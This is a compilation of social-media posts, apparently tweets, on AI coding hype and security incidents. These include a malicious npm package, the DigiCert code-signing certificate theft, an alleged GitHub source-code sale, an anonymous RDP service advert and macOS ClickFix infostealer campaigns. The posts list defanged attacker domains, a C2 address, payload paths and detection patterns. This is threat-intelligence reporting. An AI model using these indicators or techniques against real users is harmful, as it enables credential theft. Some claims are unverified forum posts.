Roland Emmanuel Salunga

I think AI coding hype follows roughly four stages: 1. Amazement You try it and can’t believe how much code it generates from a few prompts. 2. Expansion You start more and more projects because shipping suddenly feels cheap and fast. This is also the phase where people start convincing everyone around them: - coworkers - management - friends in other companies because nobody wants to “fall behind” in 6–12 months. That creates a massive snowball/FOMO effect. 3. The grind phase You realize the generated code has architectural issues, sloppy mistakes, weird abstractions, duplicated logic, broken edge cases, etc. So you start: - re-prompting - switching models - increasing reasoning effort - reviewing fixes - generating fixes for previous fixes And suddenly you spend your days reviewing AI-generated pull requests instead of building software. 4. Realization You realize AI coding increases output much faster than it increases certainty. The code still needs: - review - testing - ownership - architectural understanding - long-term maintenance Usually by expensive senior engineers. And the interesting thing is: this whole cycle can take many months or even more than a year because people become socially and professionally invested in the narrative themselves. Once teams, managers, and entire companies have been convinced that this is the future, it becomes psychologically and politically very hard to later say: “Actually, the ROI is much lower than we expected.”

⚠️ WARNING - A malicious npm package was caught stealing files from Claude AI users’ /mnt/user-data directories and uploading them to attacker-controlled GitHub repositories. Check your installed packages: https://t.co/Ev9AKDSria The package, “mouse5212-super-formatter,” used npm postinstall scripts, hard-coded GitHub tokens, and fake network logs to hide the theft. Downloaded 676 times so far.

We are working on our first cloud intrusion investigation for Threat Hunting Labs. The lab is not live yet, but we wanted to start sharing some of the intrusion details because this case represents an important direction for THL. The intrusion began with a compromised developer macOS workstation. The workstation was infected by an infostealer. The developer had long-lived AWS access keys stored locally for a service integration and loaded them as environment variables during development. Those credentials were collected by the stealer and later used from external infrastructure to access the AWS environment. From there, the activity unfolded across 3 days and included: - enumeration - discovery - privilege escalation - lateral movement - data exfiltration This is exactly the kind of cloud intrusion we want analysts to investigate inside Threat Hunting Labs. It connects endpoint compromise, developer credential exposure, AWS access, identity activity, cloud control-plane behavior, and attacker progression across time. We are still building the lab, but we are excited about where this takes THL next. Cloud intrusions are becoming a major focus for us, and this case will be the first full cloud investigation we bring to the platform. To our knowledge, it will also be the first real cloud intrusion investigation of its kind available anywhere for hands-on analyst training.

🚨 GitHub source code allegedly offered for sale: Internal orgs and private repositories claimed A threat actor using the alias TeamPCP claims to be selling GitHub source code and internal organization data. The actor claims the dataset includes around 4,000 private repositories and says samples can be provided to interested buyers to verify authenticity. ━━━━━━━━━━━━━━━━━━━━ Target: GitHub Country: United States Sector: Technology / Software Development / Source Code Incident Type: Alleged Source Code Sale Claimed Exposure: Around 4,000 private repositories Actor: TeamPCP Price: Offers over $50,000 ━━━━━━━━━━━━━━━━━━━━ According to the post, the actor claims the material includes source code and internal organization data tied to GitHub’s main platform. The post also references a public file list and includes screenshots showing numerous repository archive names. Why it matters: If authentic, exposed source code and internal repository data could increase the risk of code review by hostile actors, vulnerability discovery, supply chain targeting, impersonation, phishing, and follow-on attacks against developer infrastructure. Status: This remains an unverified underground forum claim. The actor states this is not a ransom attempt and claims the data may be leaked publicly if no buyer is found. Stop guessing what's redacted. Subscribers see everything → https://t.co/281Qjc6WSh

1/ We are sharing additional details regarding our investigation into unauthorized access to GitHub's internal repositories. Yesterday we detected and contained a compromise of an employee device involving a poisoned VS Code extension. We removed the malicious extension version, isolated the endpoint, and began incident response immediately.

"Use a computer. Then make it vanish." ‼️https://t.co/Aua4aPjOHE allegedly advertised as disposable anonymous RDP service for Windows & Linux A threat actor is promoting https://t.co/Aua4aPjOHE, a service marketed as a disposable cloud desktop platform offering anonymous Windows and Linux RDP access. The service advertises no-email signup, cryptocurrency-only payments, and full destruction of VMs, disks, and keys on termination, branded as "anonymous by design" and aimed at users seeking untraceable remote computing infrastructure. Post details: ▸ Actor(s): gravem1nd (VIP) ▸ Sector: Anonymous Hosting / Disposable RDP ▸ Type: Service Advertisement ▸ Format: Browser-based RDP + SSH ▸ Country: Multi-region (DE, US, AU) ▸ Date: 10/05/2026 Service features: ▪ Full Windows or Linux RDP in-browser, deployable in under 60 seconds ▪ Supported OS: Windows 11, Windows Server 2022, Ubuntu, Debian, Fedora, Parrot ▪ Regions: Frankfurt, NYC, Sydney ▪ WireGuard kill switch, all traffic forced through encrypted VPN at firewall level ▪ No email signup, password-only authentication ▪ "Pop & Gone" destruction, VM, disk, and keys wiped on termination, advertised as unrecoverable ▪ LUKS full-disk encryption on NVMe storage at rest ▪ Browser RDP + SSH access, no client install required ▪ US and EU exit nodes for traffic routing ▪ Plans: Micro ($9/mo, 2 vCPU, 4GB RAM, 60GB, 1 Bubble), Standard ($19/mo, 4 vCPU, 8GB RAM, 120GB, 2 Bubbles), Pro ($39/mo, 6 vCPU, 12GB RAM, 180GB, 3 Bubbles) ▪ Payment: BTC, ETH, XMR, LTC plus 50 more cryptocurrencies ▪ Slogan: "No logs, no traces, no recovery" Stop guessing what's redacted. Subscribers see everything → https://t.co/281Qjc6p2J

DFIR Weekly Recap | This week brought fresh Linux kernel exploits, persistent firmware threats, and a surge in mobile-targeted malware campaigns. • Copy Fail and DirtyFrag expose critical Linux page cache vulnerabilities exploited in the wild • FIRESTARTER firmware implant survives patches and reboots, challenging traditional IR approaches • UAT-8302 deploys extensive malware arsenal across multiple attack vectors • CloudZ RAT targets OTP messages through specialized Pheno plugin capabilities • TCLBANKER spreads Brazilian banking trojan via WhatsApp and Outlook channels • OpenClaw skill distributes Remcos RAT and GhostLoader to unsuspecting users • ClickFix leverages fake macOS utilities to deliver sophisticated infostealers • State-sponsored actors hide behind Chaos ransomware operations • WAInsight provides new open-source forensics for WhatsApp Android analysis • HumanitarianBait masks infostealer campaign as legitimate humanitarian effort Top stories in the thread below. #DFIR_Radar

Microsoft tracks macOS ClickFix campaign using fake utility guides to deliver SHub Stealer, Macsync, and AMOS infostealers. Three distinct attack chains bypass Gatekeeper by leveraging Terminal commands instead of traditional app bundles. Key technical details: • Initial access via fake troubleshooting sites hosting Base64-encoded Terminal commands • Loader campaign creates persistence at ~/LaunchAgents/com.google.keystone.agent.plist mimicking Google Update • Script campaign uses Telegram fallback C2 (hxxps://t[.]me/ax03bot) when primary infrastructure fails • Helper campaign (AMOS) stages payloads in /tmp/helper or /tmp/update with virtualization detection • All variants collect Keychain entries, browser credentials, cryptocurrency wallets, and iCloud data Attack methodology: • Social engineering through Medium blogs and Squarespace sites claiming macOS "fixes" • Terminal execution bypasses Gatekeeper checks applied to .dmg files • Russian/CIS keyboard layouts trigger kill switch in loader variant • Trojanized crypto apps replace legitimate Trezor Suite, Ledger Wallet, and Exodus installations Data exfiltration to endpoints like /api/debug/event, /gate/chunk, /upload.php, and /contact. Staging directories use patterns /tmp/shub_<random_ID> and cleanup artifacts post-exfiltration. Hunt for curl commands with Base64 payloads, osascript execution from network streams, and LaunchAgent plist creation in user directories. #DFIR_Radar

‼️🚨 One of the world's largest Certificate Authorities, DigiCert, was compromised by a malicious screensaver file sent through a customer support chat. Their antivirus blocked the malware four times. The agent kept clicking. The fifth try got through. 27 code signing certificates were stolen and used to sign malware. DigiCert ultimately revoked 60 certificates. Per DigiCert's incident report, filed in Mozilla's CA compliance tracker as Bug 2033170, here is how it unfolded: April 2: an attacker contacted a DigiCert helpdesk agent through the company's customer support chat channel, posing as a customer. The lure was a zip file pitched as a screenshot. Inside the zip was a .scr file. On Windows, .scr files are executables, and this one carried a malicious payload. Opening a file a customer sent through the official support channel is what an agent is supposed to do. Support staff are the one role designed to accept files from strangers. DigiCert's endpoint security blocked four infection attempts. On the fifth, the support analyst's machine was infected. DigiCert detected the infection, ran an investigation, and concluded the incident was contained. Eleven days later, an external researcher tipped DigiCert off about misuse of DigiCert-issued code signing certificates in the wild. That tip led to the discovery of a second compromised machine, belonging to a different support analyst, infected through the same vector. The EDR on that machine had not been functioning correctly, so the original investigation missed it. The second machine gave the attacker access to DigiCert's internal support portal. That portal lets support staff reach limited views of customer accounts, including initialization codes for ordered but not-yet-issued code signing certificates. Combining a stolen initialization code with an approved order let the attacker pull a real, validly issued code signing certificate. They did this 27 times. DigiCert's own list of what went wrong: - File-type filtering on the customer support chat channel did not catch the .scr - EDR coverage was inconsistent and incomplete, creating a blind spot - Initialization codes for code signing certificates were not adequately protected DigiCert says it got lucky. An outside researcher found the malware abuse before DigiCert did. Without that tip, the second machine and the active certificate theft might still be running today.

New macOS malware campaign uses malicious Google ads to redirect victims to ClickFix-style fake Claude AI download pages. Attack leverages social engineering to trick users into manually executing Mach-O malware via terminal commands. Attack chain breakdown: • Malicious Google ad redirects to cladesktop.gitlab[.]io posing as legitimate Claude AI desktop app • ClickFix-style page instructs users to copy/paste terminal commands for "installation" • Downloads arm64 Mach-O executable (16.5MB) from arkypc[.]com/n8n/update to /tmp/helper • Malware beacons to C2 server 45.94.47[.]204:80 and checks api.ipify[.]org for public IP • Multiple suspicious domains registered March-April 2026 suggest coordinated infrastructure DFIR artifacts: • Terminal history shows pasted ClickFix commands and curl downloads • Binary saved to /tmp/helper (SHA256: e6e54a8e8f30cedd8492f515ab95e005478bafb41998c43341fcf3a494573d6c) • Network connections to C2 and IP geolocation services • Browser history contains fake Claude domain visits Hunt for recent /tmp/ executable downloads, suspicious curl commands in bash history, and connections to newly registered domains. Full PCAP and malware samples available. #DFIR_Radar